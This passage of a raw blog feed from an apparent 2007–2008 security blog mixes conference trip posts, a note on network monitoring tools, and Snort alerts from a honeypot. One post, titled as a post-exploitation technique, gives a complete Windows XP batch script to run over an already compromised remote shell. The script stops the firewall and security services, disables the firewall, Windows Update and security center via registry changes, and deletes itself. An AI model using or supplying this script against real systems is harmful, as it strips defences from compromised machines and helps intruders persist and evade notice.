rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_Z4u4MkgQQuE/R8Vh51ZeZ7I/AAAAAAAAABs/cX9LB3fv9CY/s72-c/shmoocon_logo.png' height='72' width='72'/><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-8163719505713779923</id><published>2008-02-16T04:41:00.001-08:00</published><updated>2008-12-11T01:34:28.330-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Detroit'/><category scheme='http://www.blogger.com/atom/ns#' term='Maryland'/><category scheme='http://www.blogger.com/atom/ns#' term='Baltimore'/><category scheme='http://www.blogger.com/atom/ns#' term='Seattle'/><title type='text'>Shmoocon Day Zero</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_Z4u4MkgQQuE/R8VnuFZeaBI/AAAAAAAAACc/I4DjiBNxPao/s1600-h/100px-Great_Seal_of_Maryland_reverse.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://2.bp.blogspot.com/_Z4u4MkgQQuE/R8VnuFZeaBI/AAAAAAAAACc/I4DjiBNxPao/s200/100px-Great_Seal_of_Maryland_reverse.png" alt="" id="BLOGGER_PHOTO_ID_5171653788525553682" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;  	&lt;meta equiv="CONTENT-TYPE" content="text/html; charset=utf-8"&gt;&lt;title&gt;&lt;/title&gt;&lt;meta name="GENERATOR" content="OpenOffice.org 2.3  (Linux)"&gt; 	 	 	&lt;style type="text/css"&gt; 	&lt;!-- 		@page { size: 8.5in 11in; margin: 0.79in } 		P { margin-bottom: 0.08in } 	--&gt;&lt;/style&gt;&lt;span style="font-family: verdana;"&gt;Law and I caught a red eye at 10pm out of SEA to BWI with a connecting flight through Detroit.  One of the most uncomfortable experiences of my life.  J0e picked us up from the airport and took us straight to the bar at 8:30am.  Drove back to his place in Maryland, took a nap, took out got acquainted with local network and hacked around a little bit. Met Wolf, picked up evil1 from the Reagan airport in DC, went back to the bar (which caught on fire which is another story for another time), did some urban exploring (evil1 did), drove back to Maryland (j0e got a speeding ticket), and hacked until 5am.&lt;/span&gt; &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-8163719505713779923?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/8163719505713779923/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=8163719505713779923&amp;isPopup=true' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/8163719505713779923'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/8163719505713779923'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2008/02/shmoocon-day-zero.html' title='Shmoocon Day Zero'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_Z4u4MkgQQuE/R8VnuFZeaBI/AAAAAAAAACc/I4DjiBNxPao/s72-c/100px-Great_Seal_of_Maryland_reverse.png' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-8571910091590301133</id><published>2007-12-01T17:22:00.000-08:00</published><updated>2008-12-11T01:34:28.719-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Shmoocon'/><category scheme='http://www.blogger.com/atom/ns#' term='Chris Gates'/><category scheme='http://www.blogger.com/atom/ns#' term='blackhat'/><category scheme='http://www.blogger.com/atom/ns#' term='Beltsville'/><category scheme='http://www.blogger.com/atom/ns#' term='Joe McCray'/><category scheme='http://www.blogger.com/atom/ns#' term='LearnSecurityOnline'/><title type='text'>Going to Shmoocon and Blackhat DC 2008</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Z4u4MkgQQuE/R8VpDVZeaDI/AAAAAAAAACs/yDMWJPTFM5Y/s1600-h/copyrighthead.gif"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://3.bp.blogspot.com/_Z4u4MkgQQuE/R8VpDVZeaDI/AAAAAAAAACs/yDMWJPTFM5Y/s200/copyrighthead.gif" alt="" id="BLOGGER_PHOTO_ID_5171655253109401650" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_Z4u4MkgQQuE/R8Vo7FZeaCI/AAAAAAAAACk/AwQpC8w6CiY/s1600-h/shmoocon_logo.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://2.bp.blogspot.com/_Z4u4MkgQQuE/R8Vo7FZeaCI/AAAAAAAAACk/AwQpC8w6CiY/s200/shmoocon_logo.png" alt="" id="BLOGGER_PHOTO_ID_5171655111375480866" border="0" /&gt;&lt;/a&gt;&lt;span style="font-family:verdana;"&gt;Lawrence and I finally got our hands on some tickets to Shmoocon (Blackhat was locked up ages ago).  We are really looking forward to hanging out with the guys from LearnSecurityOnline.com (Joe and Chris) and making some new friends and sharing ideas and techniques with others.  I have personally never been to DC (does Beltsville count?) and look forward to the entire experience.&lt;br /&gt;&lt;br /&gt;I have only heard great things about Shmoocon and eagerly look forward to attending!&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-8571910091590301133?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/8571910091590301133/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=8571910091590301133&amp;isPopup=true' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/8571910091590301133'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/8571910091590301133'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2007/12/going-to-shmoocon-and-blackhat-dc-2008.html' title='Going to Shmoocon and Blackhat DC 2008'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_Z4u4MkgQQuE/R8VpDVZeaDI/AAAAAAAAACs/yDMWJPTFM5Y/s72-c/copyrighthead.gif' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-7922474890899582356</id><published>2007-11-16T07:16:00.000-08:00</published><updated>2007-11-16T07:27:03.903-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Argus'/><category scheme='http://www.blogger.com/atom/ns#' term='Afterglow'/><category scheme='http://www.blogger.com/atom/ns#' term='ISSA Journal'/><category scheme='http://www.blogger.com/atom/ns#' term='NSMWiki'/><category scheme='http://www.blogger.com/atom/ns#' term='Russ McRee'/><category scheme='http://www.blogger.com/atom/ns#' term='Sguil'/><title type='text'>Argus, Afterflow and NSMWiki</title><content type='html'>&lt;span style="font-family: verdana;"&gt;This month's &lt;/span&gt;&lt;a style="font-family: verdana;" href="http://www.issa.org/Members/Journal.html"&gt;ISSA Journal&lt;/a&gt;&lt;span style="font-family: verdana;"&gt; has an interesting article by &lt;/span&gt;&lt;a style="font-family: verdana;" href="http://holisticinfosec.org/content/view/12/26/"&gt;Russ McRee&lt;/a&gt;&lt;span style="font-family: verdana;"&gt; on NSM topics. &lt;/span&gt;&lt;span style="font-family: verdana;"&gt;  The main topic is &lt;/span&gt;&lt;a style="font-family: verdana;" href="http://www.qosient.com/argus/"&gt;Argus&lt;/a&gt;&lt;span style="font-family: verdana;"&gt;, an excellent suite of tools for implementing distributed collection of network flow information and graphing the output using &lt;a href="http://www.google.com/url?sa=t&amp;amp;ct=res&amp;amp;cd=3&amp;amp;url=http%3A%2F%2Fafterglow.sourceforge.net%2F&amp;amp;ei=qrU9R6SqG5q8gwPV9qSmCg&amp;amp;usg=AFQjCNGDYSfwt3xKmI7qKTm7OPGglvvbuQ&amp;amp;sig2=KU59r1IHTEXpSJnp1HFAaQ"&gt;Afterglow&lt;/a&gt;. It also happens that he mentions &lt;/span&gt;&lt;a style="font-family: verdana;" href="http://wiki.sguil.net/"&gt;NSMWiki&lt;/a&gt;&lt;span style="font-family: verdana;"&gt;, which is maintained for the &lt;/span&gt;&lt;a style="font-family: verdana;" href="http://www.sguil.net/"&gt;Sguil project&lt;/a&gt;&lt;span style="font-family: verdana;"&gt;.  &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;If you're not an ISSA member, you can read Russ' article &lt;/span&gt;&lt;a style="font-family: verdana;" href="http://holisticinfosec.org/toolsmith/docs/november2007.pdf"&gt;here&lt;/a&gt;&lt;span style="font-family: verdana;"&gt;.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-7922474890899582356?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/7922474890899582356/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=7922474890899582356&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/7922474890899582356'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/7922474890899582356'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2007/11/argus-afterflow-and-nsmwiki.html' title='Argus, Afterflow and NSMWiki'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-5365088787451632132</id><published>2007-11-09T08:06:00.000-08:00</published><updated>2007-11-09T08:10:43.355-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='remote shell'/><category scheme='http://www.blogger.com/atom/ns#' term='Firewall'/><category scheme='http://www.blogger.com/atom/ns#' term='registry hack'/><category scheme='http://www.blogger.com/atom/ns#' term='batch file'/><category scheme='http://www.blogger.com/atom/ns#' term='Windows XP'/><title type='text'>Post Exploitation Technique: Kill the Windows XP SP2 firewall</title><content type='html'>&lt;style type="text/css"&gt;!--   @page { size: 8.5in 11in; margin: 0.79in }   P { margin-bottom: 0.08in }  --&gt;  &lt;/style&gt;  &lt;p style="margin-bottom: 0in; font-family: verdana;"&gt;This registry hack assumes that you already possess a remote shell and need to kill the firewall remotely (to spawn remote shells on certain egress ports).    To use, save the code below into a batch file (ie down.bat) and run on the remote computer.&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-family: verdana;"&gt;&lt;br /&gt;@echo off&lt;br /&gt;net stop "Security Center"&lt;br /&gt;net stop SharedAccess&lt;br /&gt;&gt; "%Temp%.\kill.reg" ECHO REGEDIT4&lt;br /&gt;&gt;&gt;"%Temp%.\kill.reg" ECHO.&lt;br /&gt;&gt;&gt;"%Temp%.\kill.reg" ECHO&lt;br /&gt;[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]&lt;br /&gt;&gt;&gt;"%Temp%.\kill.reg" ECHO "Start"=dword:00000004&lt;br /&gt;&gt;&gt;"%Temp%.\kill.reg" ECHO.&lt;br /&gt;&gt;&gt;"%Temp%.\kill.reg" ECHO&lt;br /&gt;[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]&lt;br /&gt;&gt;&gt;"%Temp%.\kill.reg" ECHO "Start"=dword:00000004&lt;br /&gt;&gt;&gt;"%Temp%.\kill.reg" ECHO.&lt;br /&gt;&gt;&gt;"%Temp%.\kill.reg" ECHO&lt;br /&gt;[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]&lt;br /&gt;&gt;&gt;"%Temp%.\kill.reg" ECHO "Start"=dword:00000004&lt;br /&gt;&gt;&gt;"%Temp%.\kill.reg" ECHO.&lt;br /&gt;START /WAIT REGEDIT /S "%Temp%.\kill.reg"&lt;br /&gt;DEL "%Temp%.\kill.reg"&lt;br /&gt;DEL %0&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;p style="margin-bottom: 0in;"&gt;&lt;span style="font-family: verdana;"&gt;May Your Skill Prevail. &lt;/span&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-5365088787451632132?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/5365088787451632132/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=5365088787451632132&amp;isPopup=true' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/5365088787451632132'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/5365088787451632132'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2007/11/post-exploitation-technique-kill.html' title='Post Exploitation Technique: Kill the Windows XP SP2 firewall'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-3523958122558272361</id><published>2007-11-08T20:03:00.000-08:00</published><updated>2007-11-08T20:08:10.230-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ms-sql'/><category scheme='http://www.blogger.com/atom/ns#' term='mysql'/><category scheme='http://www.blogger.com/atom/ns#' term='cve'/><category scheme='http://www.blogger.com/atom/ns#' term='script kiddies'/><category scheme='http://www.blogger.com/atom/ns#' term='snort'/><category scheme='http://www.blogger.com/atom/ns#' term='honeywall'/><title type='text'>When Script Kiddies Attack!</title><content type='html'>&lt;div style="direction: ltr; font-family: verdana;"&gt;Snort alerts from our resident Honeywall!  Even though we are currently running MySQL as our flypaper there are sk's running relentless MS-SQL attempts.  This is data material but I thought that it would be of nominal interest nonetheless.&lt;br /&gt;&lt;br /&gt; [**] [1:2003:8] MS-SQL Worm propagation attempt [**]&lt;br /&gt;&lt;br /&gt; [Classification: Misc Attack] [Priority: 2]&lt;br /&gt;&lt;br /&gt; 08/14-07:35:43.418518 &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://10.10.10.254:2456/" target="_blank"&gt;10.10.10.254:2456&lt;/a&gt; -&gt; &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://10.1.4.3:1434/" target="_blank"&gt;10.1.4.3:1434&lt;/a&gt;&lt;br /&gt;&lt;br /&gt; UDP TTL:110 TOS:0x20 ID:24321 IpLen:20 DgmLen:404&lt;br /&gt;&lt;br /&gt; Len: 376&lt;br /&gt;&lt;br /&gt; [Xref =&gt; &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://vil.nai.com/vil/content/v_99992.htm%5D%5BXref" target="_blank"&gt;http://vil.nai.com/vil/content&lt;wbr&gt;/v_99992.htm][Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://cgi.nessus.org/plugins/dump.php3?id=11214%5D%5BXref" target="_blank"&gt;http://cgi.nessus.org/plugins&lt;wbr&gt;/dump.php3?id=11214][Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649%5D%5BXref" target="_blank"&gt;http://cve.mitre.org/cgi-bin&lt;wbr&gt;/cvename.cgi?name=2002-0649]&lt;wbr&gt;[Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.securityfocus.com/bid/5311%5D%5BXref" target="_blank"&gt;http://www.securityfocus.com&lt;wbr&gt;/bid/5311][Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.securityfocus.com/bid/5310" target="_blank"&gt;http://www.securityfocus.com&lt;wbr&gt;/bid/5310&lt;/a&gt;]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; [**] [1:2004:7] MS-SQL Worm propagation attempt OUTBOUND [**]&lt;br /&gt;&lt;br /&gt; [Classification: Misc Attack] [Priority: 2]&lt;br /&gt;&lt;br /&gt; 08/14-07:35:43.418518 &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://10.10.10.254:2456/" target="_blank"&gt;10.10.10.254:2456&lt;/a&gt; -&gt; &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://10.1.4.3:1434/" target="_blank"&gt;&lt;script&gt;&lt;!-- D(["mb","10.1.4.3:1434\u003c/a\&gt;\u003cbr /\&gt;\u003cbr /\&gt; UDP TTL:110 TOS:0x20 ID:24321 IpLen:20 DgmLen:404\u003cbr /\&gt;\u003cbr /\&gt; Len: 376\u003cbr /\&gt;\u003cbr /\&gt; [Xref \u003d&gt; \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://vil.nai.com/vil/content/v_99992.htm][Xref\" target\u003d_blank\&gt;http://vil.nai.com/vil/content\u003cwbr /\&gt;/v_99992.htm][Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://cgi.nessus.org/plugins/dump.php3?id\u003d11214][Xref\" target\u003d_blank\&gt;http://cgi.nessus.org/plugins\u003cwbr /\&gt;/dump.php3?id\u003d11214][Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://cve.mitre.org/cgi-bin/cvename.cgi?name\u003d2002-0649][Xref\" target\u003d_blank\&gt;http://cve.mitre.org/cgi-bin\u003cwbr /\&gt;/cvename.cgi?name\u003d2002-0649]\u003cwbr /\&gt;[Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://www.securityfocus.com/bid/5311][Xref\" target\u003d_blank\&gt;http://www.securityfocus.com\u003cwbr /\&gt;/bid/5311][Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://www.securityfocus.com/bid/5310\" target\u003d_blank\&gt;http://www.securityfocus.com\u003cwbr /\&gt;/bid/5310\u003c/a\&gt;]\u003cbr /\&gt;\u003cbr /\&gt;\u003cbr /\&gt;\u003cbr /\&gt; [**] [1:2050:9] MS-SQL version overflow attempt [**]\u003cbr /\&gt;\u003cbr /\&gt; [Classification: Misc activity] [Priority: 3]\u003cbr /\&gt;\u003cbr /\&gt; 08/14-07:35:43.418518 \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://10.10.10.254:2456\" target\u003d_blank\&gt;10.10.10.254:2456\u003c/a\&gt; -&gt; \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://10.1.4.3:1434\" target\u003d_blank\&gt;10.1.4.3:1434\u003c/a\&gt;\u003cbr /\&gt;\u003cbr /\&gt; UDP TTL:110 TOS:0x20 ID:24321 IpLen:20 DgmLen:404\u003cbr /\&gt;\u003cbr /\&gt; Len: 376\u003cbr /\&gt;\u003cbr /\&gt; [Xref \u003d&gt; \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://www.microsoft.com/technet/security/bulletin/MS02-039.mspx][Xref\" target\u003d_blank\&gt;http://www.microsoft.com\u003cwbr /\&gt;/technet/security/bulletin\u003cwbr /\&gt;/MS02-039.mspx][Xref\u003c/a\&gt;\u003cbr /\&gt;\u003d&gt; \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://cgi.nessus.org/plugins/dump.php3?id\u003d10674][Xref\" target\u003d_blank\&gt;",1] );  //--&gt;&lt;/script&gt;10.1.4.3:1434&lt;/a&gt;&lt;br /&gt;&lt;br /&gt; UDP TTL:110 TOS:0x20 ID:24321 IpLen:20 DgmLen:404&lt;br /&gt;&lt;br /&gt; Len: 376&lt;br /&gt;&lt;br /&gt; [Xref =&gt; &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://vil.nai.com/vil/content/v_99992.htm%5D%5BXref" target="_blank"&gt;http://vil.nai.com/vil/content&lt;wbr&gt;/v_99992.htm][Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://cgi.nessus.org/plugins/dump.php3?id=11214%5D%5BXref" target="_blank"&gt;http://cgi.nessus.org/plugins&lt;wbr&gt;/dump.php3?id=11214][Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649%5D%5BXref" target="_blank"&gt;http://cve.mitre.org/cgi-bin&lt;wbr&gt;/cvename.cgi?name=2002-0649]&lt;wbr&gt;[Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.securityfocus.com/bid/5311%5D%5BXref" target="_blank"&gt;http://www.securityfocus.com&lt;wbr&gt;/bid/5311][Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.securityfocus.com/bid/5310" target="_blank"&gt;http://www.securityfocus.com&lt;wbr&gt;/bid/5310&lt;/a&gt;]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; [**] [1:2050:9] MS-SQL version overflow attempt [**]&lt;br /&gt;&lt;br /&gt; [Classification: Misc activity] [Priority: 3]&lt;br /&gt;&lt;br /&gt; 08/14-07:35:43.418518 &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://10.10.10.254:2456/" target="_blank"&gt;10.10.10.254:2456&lt;/a&gt; -&gt; &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://10.1.4.3:1434/" target="_blank"&gt;10.1.4.3:1434&lt;/a&gt;&lt;br /&gt;&lt;br /&gt; UDP TTL:110 TOS:0x20 ID:24321 IpLen:20 DgmLen:404&lt;br /&gt;&lt;br /&gt; Len: 376&lt;br /&gt;&lt;br /&gt; [Xref =&gt; &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.microsoft.com/technet/security/bulletin/MS02-039.mspx%5D%5BXref" target="_blank"&gt;http://www.microsoft.com&lt;wbr&gt;/technet/security/bulletin&lt;wbr&gt;/MS02-039.mspx][Xref&lt;/a&gt;&lt;br /&gt;=&gt; &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://cgi.nessus.org/plugins/dump.php3?id=10674%5D%5BXref" target="_blank"&gt;&lt;script&gt;&lt;!-- D(["mb","http://cgi.nessus.org/plugins\u003cwbr /\&gt;/dump.php3?id\u003d10674][Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://cve.mitre.org/cgi-bin/cvename.cgi?name\u003d2002-0649][Xref\" target\u003d_blank\&gt;http://cve.mitre.org/cgi-bin\u003cwbr /\&gt;/cvename.cgi?name\u003d2002-0649]\u003cwbr /\&gt;[Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://www.securityfocus.com/bid/5310\" target\u003d_blank\&gt;http://www.securityfocus.com\u003cwbr /\&gt;/bid/5310\u003c/a\&gt;]\u003cbr /\&gt;\u003cbr /\&gt;\u003cbr /\&gt;\u003cbr /\&gt; [**] [1:2003:8] MS-SQL Worm propagation attempt [**]\u003cbr /\&gt;\u003cbr /\&gt; [Classification: Misc Attack] [Priority: 2]\u003cbr /\&gt;\u003cbr /\&gt; 08/14-15:28:04.702026 \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://218.232.95.60:3664\" target\u003d_blank\&gt;218.232.95.60:3664\u003c/a\&gt; -&gt; \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://10.1.4.3:1434\" target\u003d_blank\&gt;10.1.4.3:1434\u003c/a\&gt;\u003cbr /\&gt;\u003cbr /\&gt; UDP TTL:108 TOS:0x20 ID:34162 IpLen:20 DgmLen:404\u003cbr /\&gt;\u003cbr /\&gt; Len: 376\u003cbr /\&gt;\u003cbr /\&gt; [Xref \u003d&gt; \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://vil.nai.com/vil/content/v_99992.htm][Xref\" target\u003d_blank\&gt;http://vil.nai.com/vil/content\u003cwbr /\&gt;/v_99992.htm][Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://cgi.nessus.org/plugins/dump.php3?id\u003d11214][Xref\" target\u003d_blank\&gt;http://cgi.nessus.org/plugins\u003cwbr /\&gt;/dump.php3?id\u003d11214][Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://cve.mitre.org/cgi-bin/cvename.cgi?name\u003d2002-0649][Xref\" target\u003d_blank\&gt;http://cve.mitre.org/cgi-bin\u003cwbr /\&gt;/cvename.cgi?name\u003d2002-0649]\u003cwbr /\&gt;[Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://www.securityfocus.com/bid/5311][Xref\" target\u003d_blank\&gt;http://www.securityfocus.com\u003cwbr /\&gt;/bid/5311][Xref\u003c/a\&gt; \u003d&gt;\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://www.securityfocus.com/bid/5310\" target\u003d_blank\&gt;http://www.securityfocus.com\u003cwbr /\&gt;/bid/5310\u003c/a\&gt;]\u003cbr /\&gt;\u003cbr /\&gt;\u003cbr /\&gt;\u003cbr /\&gt;",1] );  //--&gt;&lt;/script&gt;http://cgi.nessus.org/plugins&lt;wbr&gt;/dump.php3?id=10674][Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649%5D%5BXref" target="_blank"&gt;http://cve.mitre.org/cgi-bin&lt;wbr&gt;/cvename.cgi?name=2002-0649]&lt;wbr&gt;[Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.securityfocus.com/bid/5310" target="_blank"&gt;http://www.securityfocus.com&lt;wbr&gt;/bid/5310&lt;/a&gt;]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; [**] [1:2003:8] MS-SQL Worm propagation attempt [**]&lt;br /&gt;&lt;br /&gt; [Classification: Misc Attack] [Priority: 2]&lt;br /&gt;&lt;br /&gt; 08/14-15:28:04.702026 &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://218.232.95.60:3664/" target="_blank"&gt;218.232.95.60:3664&lt;/a&gt; -&gt; &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://10.1.4.3:1434/" target="_blank"&gt;10.1.4.3:1434&lt;/a&gt;&lt;br /&gt;&lt;br /&gt; UDP TTL:108 TOS:0x20 ID:34162 IpLen:20 DgmLen:404&lt;br /&gt;&lt;br /&gt; Len: 376&lt;br /&gt;&lt;br /&gt; [Xref =&gt; &lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://vil.nai.com/vil/content/v_99992.htm%5D%5BXref" target="_blank"&gt;http://vil.nai.com/vil/content&lt;wbr&gt;/v_99992.htm][Xref&lt;/a&gt; =&gt;&lt;br /&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://cgi.nessus.org/plugins/dump.php3?id=11214%5D%5BXref" target="_blank"&gt;http://cgi.nessus.org/plugins&lt;wbr&gt;/dump.php3?id=11214][Xref&lt;/a&gt; 